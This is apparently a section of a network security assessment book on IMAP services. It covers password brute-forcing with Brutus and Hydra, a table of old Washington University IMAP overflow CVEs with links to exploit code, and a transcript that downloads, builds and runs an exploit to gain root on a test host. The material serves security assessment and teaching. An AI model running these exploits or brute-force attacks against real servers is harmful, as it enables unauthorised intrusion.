10.4 IMAP

Internet Message Access Protocol (IMAP) services are commonly found running on TCP port 143. The IMAP protocol is much like POP-3; a user authenticates with a plaintext network service and can then collect and manage their email.

Most accessible IMAP servers on the Internet today run the Washington University IMAP service (known as both UW IMAP and WU-IMAP), distributed from the official UW IMAP site at http://www.washington.edu/imap/. Mark Crispin (http://staff.washington.edu/mrc/) invented and maintains IMAP, which currently uses IMAP4rev1 as the standard server protocol (RFC 3501).

10.4.1 IMAP Brute Force

As with many other simple plaintext protocols (Telnet, FTP, POP-3, etc.), Brutus and Hydra do an excellent job brute-forcing valid user-account passwords from both Unix-based and Win32 GUI environments. As mentioned earlier, they can be downloaded from:

http://www.hoobie.net/brutus/brutus-download.html

http://www.thc.org/releases.php

Like POP-3, IMAP services are notoriously susceptible to brute-force password-grinding attack because they don't pay attention to account lockout policies and often don't log unsuccessful authentication attempts.

10.4.2 IMAP Process Manipulation Attacks

Since 1997, a handful of remotely exploitable security vulnerabilities within IMAP2bis and IMAP4rev1 services have been publicized, which are summarized in Table 10-5.

Table 10-5. Remotely exploitable IMAP vulnerabilities
CVE name	Date	Notes
CVE-1999-0005	17/07/1998	Washington University IMAP 4 (IMAP4rev1 10.234) and prior `AUTHENTICATE` command overflow
CVE-1999-0042	02/03/1997	Washington University IMAP 4.1beta and prior `LOGIN` command overflow
CVE-2000-0233	27/03/2000	SuSE Linux IMAP server allows remote attackers to bypass IMAP authentication and gain privileges
CVE-2000-0284	16/04/2000	Washington University IMAP 4.7 (IMAP4rev1 12.264) post-authentication `LIST` command overflow
CVE-2002-0379	10/05/2002	Washington University IMAP 2000c and prior post-authentication `BODY` command overflow

The serious unauthenticated vulnerabilities in IMAP services are CVE-1999-0005 and CVE-1999-0042. Exploit scripts for the AUTHENTICATE command overflow are available for multiple platforms (including BSDi, Solaris, and Linux) at:

http://adm.freelsd.net/ADM/exploits/imap.c

http://packetstormsecurity.org/0004-exploits/solx86-imapd.c

http://packetstormsecurity.org/9902-exploits/imapx.c

http://packetstormsecurity.org/new-exploits/imapd-ex.c

The second unauthenticated vulnerability is the IMAP LOGIN command overflow, for which a good exploit script is available at http://packetstormsecurity.org/Exploit_Code_Archive/imaps.tar.gz.

After finding the correct offset to use with the exploit script, it is very straightforward to compromise a vulnerable Linux host, as shown in Example 10-11.

Example 10-11. The IMAP2bis LOGIN command overflow in action

# wget http://examples.oreilly.com/networksa/tools/imaps.tar.gz # tar xfz imaps.tar.gz # cd imaps # make cc -O2 -o imaps imaps.c imaps.c: In function `imap': imaps.c:35: warning: function returns address of local variable # ls hey.sh  imaps*  imaps.c  include/  makefile  other/  readme # ./imaps 192.168.0.35 100 Connecting to 192.168.0.35 on port 143. * OK example.org IMAP2bis Service 7.8(92) at Mon, 3 Mar 2003 13:16:02 id; uid=0(root) gid=0(root) groups=0(root)

10.4.1 IMAP Brute Force

10.4.2 IMAP Process Manipulation Attacks

Table 10-5. Remotely exploitable IMAP vulnerabilities

Example 10-11. The IMAP2bis LOGIN command overflow in action